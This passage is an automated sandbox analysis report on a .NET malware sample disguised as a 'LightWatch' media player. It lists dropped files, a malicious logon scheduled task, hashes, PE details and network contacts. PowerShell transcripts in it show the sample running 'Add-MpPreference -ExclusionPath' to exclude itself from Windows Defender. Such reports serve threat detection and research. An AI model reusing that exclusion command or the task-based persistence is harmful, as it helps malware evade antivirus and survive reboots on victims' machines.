                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whb0pjwq.qxr.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\tmp9D41.tmp
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1656
                                                                    Entropy (8bit):5.16428555186853
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3Jtn:cbha7JlNQV/rydbz9I3YODOLNdq31
                                                                    MD5:04A6B80210066CDF78CC777D7077AC7B
                                                                    SHA1:DC1B95866C360381A716ED386EA0FF326052D00E
                                                                    SHA-256:EA7625AEF7C946221703A7714B8353E6AF13EA601AFDCC9DCA2410DF46AF1B12
                                                                    SHA-512:E4B574E3E660E59CCC510644669909A1C2FF0C3B1EA32BB3F7580144A3240D80AE2E8D587CDA9ADA7B25B5364B7B5E9601479660211094C732F744899A6E1B44
                                                                    Malicious:true
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
                                                                    C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):741376
                                                                    Entropy (8bit):7.926075846118889
                                                                    Encrypted:false
                                                                    SSDEEP:12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
                                                                    MD5:42662765A94CE5ECE11529509F937711
                                                                    SHA1:DA57DD4C137C47FC9B906CAAF067C6ED13FA2DA6
                                                                    SHA-256:2138325DD5E2825EE4086187A944AF336476B0327E1DDAE7563BB24523836E08
                                                                    SHA-512:101D7BB5F778E779133F005C801FA26CF1BC147FED9F2774808526C50B3AE8E12863BC7EE3DFB060153D4B0B3A5EF66F357E44D477E1558060FE54DF990B4B95
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@.................................,[..O....`............................................................................... ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............N..............@..B................`[......H...........P...........\....<...........................................0............(!...(".........(.....o#....*.....................($......(%......(&......('......((....*N..(....o`...()....*&..(*....*.s+........s,........s-........s.........s/........*....0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0..<........~.....(5.....,!r...p.....(6...o7...s8............~.....+..*.0......
                                                                    C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe:Zone.Identifier
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.DjF4q4v1.20210503145231.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5823
                                                                    Entropy (8bit):5.383418810910059
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZmTL7NmqDo1ZFZVTL7NmqDo1Z268ijZ5TL7NmqDo1ZlTyyOZp:I
                                                                    MD5:93129E478DEEEC2478437A8363A38EA4
                                                                    SHA1:A1D28FA135CCBA1843AAF0CD815C7F13D23D11CE
                                                                    SHA-256:F2DC8F1B35EDB24FAC6D6FF9FA7098630095C73D6AF50E266403E5F7067259B4
                                                                    SHA-512:69FB157B4DF97B16645CE833E992122FEF2B1F6881BB090DB904236279E6614B85C39D8962424EB9C33EF2D3FBF242322AA997B7762824BCB5DB82EF99B46BF4
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145256..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 4592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145257..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503145745..Username: computer\user..RunAs User: DES
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.TlWWST52.20210503145228.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5823
                                                                    Entropy (8bit):5.376422136318294
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZxTL7NJqDo1ZYZBTL7NJqDo1Zz68ijZNTL7NJqDo1ZFTyylZe:S
                                                                    MD5:5494E173E7978530BD8CE47B4FFD2F6F
                                                                    SHA1:98537F033C26E27190C1140D5F81C30D4B9BA46F
                                                                    SHA-256:583B8CDC55F3E5604E9455BC869C28E0A27C53D1269DB84AFC380E033E0F0F23
                                                                    SHA-512:54F090846A3633B2DAA570A0619DDA278C3CF77518123EC11AB558903A07BE3119D862E994FE3161DEC45B62FBE6E7EEB19875BE48FF43BB4E60ADA21C9C7B0A
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145253..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 7020..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145254..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503150325..Username: computer\user..RunAs User: DES
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.loHpl5Ui.20210503145226.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3488
                                                                    Entropy (8bit):5.3223569299956495
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZNTL7NAqDo1ZG2ZRTL7NAqDo1ZGqaf0cf0cf03Zw:6rrR
                                                                    MD5:223BAC110AB9E04C3C2F1CE42C060EB9
                                                                    SHA1:0B87633A2276344A3CBE4542D80CDA52E0C40656
                                                                    SHA-256:DDA355E36125BD1DFEE7FE3280BE85A0DBA31EB7048D1637856DF32BF9907223
                                                                    SHA-512:688672FDB2F5F64CEF935D12795C633CA3B93EF800AD8ED2E4529A5C8600FC7A239AEF085B9DB8E3743FB49FEC59DC92CCC29AAF51E1C734C9646176DC7E86F1
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145249..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..**********************..Command start time: 20210503145543..**********************..PS>TerminatingError(Add-MpPreference): "A positional parameter cannot

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.926075846118889
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:HAWB AND INV.exe
                                                                    File size:741376
                                                                    MD5:42662765a94ce5ece11529509f937711
                                                                    SHA1:da57dd4c137c47fc9b906caaf067c6ed13fa2da6
                                                                    SHA256:2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
                                                                    SHA512:101d7bb5f778e779133f005c801fa26cf1bc147fed9f2774808526c50b3ae8e12863bc7ee3dfb060153d4b0b3a5ef66f357e44d477e1558060fe54df990b4b95
                                                                    SSDEEP:12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4b5b7e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x608FAFA4 [Mon May 3 08:09:08 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb5b2c0x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000xeb8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xb3b840xb3c00False0.938279620132data7.93407065965IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xb60000xeb80x1000False0.375732421875data4.76936310613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xb80000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_VERSION0xb60900x38cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                    RT_MANIFEST0xb642c0xa85XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2018
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameTOKENPRIMARYGROUP.exe
                                                                    FileVersion1.0.1.35
                                                                    CompanyNameUnguest
                                                                    LegalTrademarksUnguest
                                                                    CommentsA light media player
                                                                    ProductNameLightWatch
                                                                    ProductVersion1.0.1.35
                                                                    FileDescriptionLightWatch
                                                                    OriginalFilenameTOKENPRIMARYGROUP.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    05/03/21-14:52:13.170221ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.208071ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                    05/03/21-14:52:13.208862ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.243956ICMP449ICMP Time-To-Live Exceeded in Transit149.11.89.129192.168.2.6
                                                                    05/03/21-14:52:13.245145ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.284303ICMP449ICMP Time-To-Live Exceeded in Transit130.117.50.25192.168.2.6
                                                                    05/03/21-14:52:13.285192ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.326276ICMP449ICMP Time-To-Live Exceeded in Transit130.117.0.62192.168.2.6
                                                                    05/03/21-14:52:13.327004ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.373769ICMP449ICMP Time-To-Live Exceeded in Transit154.54.36.253192.168.2.6
                                                                    05/03/21-14:52:13.374138ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:13.420985ICMP449ICMP Time-To-Live Exceeded in Transit154.54.37.30192.168.2.6
                                                                    05/03/21-14:52:13.423338ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:17.216262ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:21.221518ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:25.217066ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:29.445869ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:33.218240ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:33.262544ICMP449ICMP Time-To-Live Exceeded in Transit4.69.163.33192.168.2.6
                                                                    05/03/21-14:52:33.263052ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:37.218445ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:41.217783ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:45.219410ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:49.218385ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:53.220185ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:52:57.218909ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:01.219208ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:05.219924ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:09.220096ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:13.220160ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:17.221426ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:21.221815ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:25.221377ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:29.221725ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:33.255775ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:37.226355ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:41.222918ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:41.302735TCP1201ATTACK-RESPONSES 403 Forbidden804975434.102.136.180192.168.2.6
                                                                    05/03/21-14:53:45.223564ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:49.223311ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:53.223679ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:57.224332ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:01.236118ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:02.995352TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.6
                                                                    05/03/21-14:54:05.232558ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:09.237107ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:13.233310ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:17.233252ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:21.233525ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:25.233831ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:29.234762ICMP384ICMP PING192.168.2.68.241.89.254

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 3, 2021 14:53:41.123671055 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.164711952 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.164901972 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.165328026 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.206484079 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.302735090 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.302769899 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:41.303035021 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.303069115 CEST4975480192.168.2.634.102.136.180
                                                                    May 3, 2021 14:53:41.344063044 CEST804975434.102.136.180192.168.2.6
                                                                    May 3, 2021 14:53:46.635814905 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:46.949348927 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:46.949485064 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:46.949692011 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:47.263036013 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:47.265083075 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:47.265172958 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:47.265407085 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:47.265433073 CEST4975780192.168.2.6202.254.234.152
                                                                    May 3, 2021 14:53:47.578778028 CEST8049757202.254.234.152192.168.2.6
                                                                    May 3, 2021 14:53:52.445022106 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.576229095 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.576344967 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.576576948 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.707530022 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709163904 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709183931 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709220886 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709239006 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709256887 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709278107 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709296942 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709311962 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709326029 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:53:52.709336996 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.709460020 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.709512949 CEST4976080192.168.2.6181.214.142.2
                                                                    May 3, 2021 14:53:52.842205048 CEST8049760181.214.142.2192.168.2.6
                                                                    May 3, 2021 14:54:02.815330029 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.856976986 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.857342958 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.857573986 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.898530960 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.995352030 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.995368958 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:02.996453047 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:02.996651888 CEST4976280192.168.2.634.102.136.180
                                                                    May 3, 2021 14:54:03.038955927 CEST804976234.102.136.180192.168.2.6
                                                                    May 3, 2021 14:54:13.178071022 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.310555935 CEST8049763107.180.57.119192.168.2.6
                                                                    May 3, 2021 14:54:13.310719013 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.310914993 CEST4976380192.168.2.6107.180.57.119
                                                                    May 3, 2021 14:54:13.442984104 CEST8049763107.180.57.119192.168.2.6
